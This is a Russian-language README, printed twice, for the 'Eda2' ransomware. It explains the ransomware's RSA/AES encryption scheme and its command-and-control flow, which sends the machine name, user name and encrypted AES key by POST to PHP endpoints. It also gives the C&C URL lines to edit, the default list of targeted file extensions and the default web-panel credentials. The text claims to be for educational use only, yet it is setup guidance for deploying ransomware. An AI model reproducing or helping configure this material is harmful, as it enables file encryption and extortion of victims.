Особенности:
Использует алгоритмы RSA и AES.
Координаты с сервером Command & Control.
Использует CSPRNG.
Использование phplibsec.
Зашифрованные файлы могут быть дешифрованы в программе дешифрования с помощью ключа шифрования.
Изменяет фон рабочего стола.
Программа отправляет запрос POST на сервер C & C с переменными pcname и username.
Сервер C & C создает пару открытых и закрытых ключей RSA. Отправляет открытый ключ в программу, сохраняет закрытый ключ внутри базы данных Mysql.
Программа создает случайный ключ для алгоритма AES.
Программа шифрует файлы с помощью алгоритма AES.
Программа шифрует ключ AES с открытым ключом RSA и отправляет его на сервер C & C с запросом POST/
Сервер C & C сохраняет зашифрованный ключ AES внутри базы данных Mysql.
Применение:
У вас должен быть веб-сервер, на котором запущены Php и Mysql. Измените эту строку URL-адресом.
Примерно вот так:
String generatorUrl = "http://www.administration.com/panel/createkeys.php";
String keySaveUrl = "http://www.administration.com/panel/savekey.php";Ransom использует 2048 размер ключа RSA. Вы можете изменить его.
Расширения шифрования целевого файла могут быть изменены. Список по умолчанию:
Var validExtensions = new [] {".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml "," .psd "};
Измените настройки своей базы данных в db.php
Учетные данные по умолчанию для веб-панели: имя пользователя: test password: test
Вы можете использовать программу дешифрования Hidden Tear для дешифрования файлов.
Eda2 может использоваться только для образовательных целей. Не используйте его как выкуп!
| | |__ \
___ __| | __ _ ) |
/ _ \/ _` |/ _` | / /
| __/ (_| | (_| |/ /_
\___|\__,_|\__,_|____|
Использует алгоритмы RSA и AES.
Координаты с сервером Command & Control.
Использует CSPRNG.
Использование phplibsec.
Зашифрованные файлы могут быть дешифрованы в программе дешифрования с помощью ключа шифрования.
Изменяет фон рабочего стола.
Программа отправляет запрос POST на сервер C & C с переменными pcname и username.
Сервер C & C создает пару открытых и закрытых ключей RSA. Отправляет открытый ключ в программу, сохраняет закрытый ключ внутри базы данных Mysql.
Программа создает случайный ключ для алгоритма AES.
Программа шифрует файлы с помощью алгоритма AES.
Программа шифрует ключ AES с открытым ключом RSA и отправляет его на сервер C & C с запросом POST/
Сервер C & C сохраняет зашифрованный ключ AES внутри базы данных Mysql.
Применение:
У вас должен быть веб-сервер, на котором запущены Php и Mysql. Измените эту строку URL-адресом.
Примерно вот так:
String generatorUrl = "http://www.administration.com/panel/createkeys.php";
String keySaveUrl = "http://www.administration.com/panel/savekey.php";Ransom использует 2048 размер ключа RSA. Вы можете изменить его.
Расширения шифрования целевого файла могут быть изменены. Список по умолчанию:
Var validExtensions = new [] {".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml "," .psd "};
Измените настройки своей базы данных в db.php
Учетные данные по умолчанию для веб-панели: имя пользователя: test password: test
Вы можете использовать программу дешифрования Hidden Tear для дешифрования файлов.
Eda2 может использоваться только для образовательных целей. Не используйте его как выкуп!
| | |__ \
___ __| | __ _ ) |
/ _ \/ _` |/ _` | / /
| __/ (_| | (_| |/ /_
\___|\__,_|\__,_|____|
